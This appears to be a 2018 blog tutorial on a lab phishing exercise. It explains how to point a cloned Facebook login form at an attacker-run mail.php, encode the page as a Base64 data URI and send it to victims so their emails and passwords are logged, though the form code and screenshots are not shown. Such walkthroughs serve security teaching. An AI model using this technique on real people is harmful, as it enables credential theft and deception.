AdSense

Monday, April 2, 2018

Phishing (II) - Data URIs scheme with Base64 encoding


PHISHING (II) - DATA URIs SCHEME WITH Base64 ENCODING

 - Layout for this exercise:
- This exercise is based in the previous one:

http://www.whitelist1.com/2018/04/phishing-i-local-redirection-and-remote.html

 - The goal of this exercise is to launch a page-less phishing attack, meaning that there is no need of hosting an html file on a server.

 - The phishing bait will be embedded in a URI, using the Data URIs scheme.

1 - Redirecting user input to the attacker machine

 - At the attacker machine Windows 10 let's open the index.html file inside xampp > htdocs using Notepad:


- Finding action= and replacing the line with the below string, where 192.168.1.6 is the Windows 10's attacker IP:

- In this way, any user input entered in a connection to the fake web page will be redirected to the file mail.php, where the credentials will be harvested.
2 - Encoding index.html with Base64

 - Base64 is a group of similar binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation.

 - Each Base64 digit represents exactly 6 bits of data, so three bytes (24 bits) can therefore be represented by 4 six-bit Base64 digits:

 https://en.wikipedia.org/wiki/Base64


- Now, using  Base64 encoding scheme, let's encode the whole index.html page, for instance with the tool offered by this website:

 https://www.base64encode.org/
- These encoded characters must be copied and stored for further use.

 - Finally, before launching the attack let's remove index.html from xampp > htdocs, because this will be a page-less phishing attack:
3 - Data URIs scheme

 - The data URIs scheme is an Uniform Resource Identifier (URI) scheme that provides a way to include data in-line in web pages as if they were external resources: 

 https://en.wikipedia.org/wiki/Data_URI_scheme


- This technique allows normally separate elements such as images and style sheets to be fetched in a single Hypertext Transfer Protocol (HTTP) request, which may be more efficient than multiple HTTP requests.

 - In other words, small files can be incorporated online into documents.

 - The syntax of data URI schema using base64 is composed of four parts:

 data: <mediatype> ; <base64> , <data>
- In our case let's prepend data:text/html;base64, to the encoded index.html:

 data:text/html;base64,PCFET0....

 1) data: <- prefix for the schema
2) text/html <- MIME data type 
3) ;base64 <- Base64 encoding is in use
4) ,PCFET0.... <- index.html encoded with Base64




4 - Launching the attack

 - Now, when the victim enters the data URI schema  into the browser (it could be provided by spam email or social engineering), a Facebook fake home page is presented.

 - Entering credentials:


- Immediately a log.txt is created at the attacker side, where email and password are harvested:










Posted by at
Labels: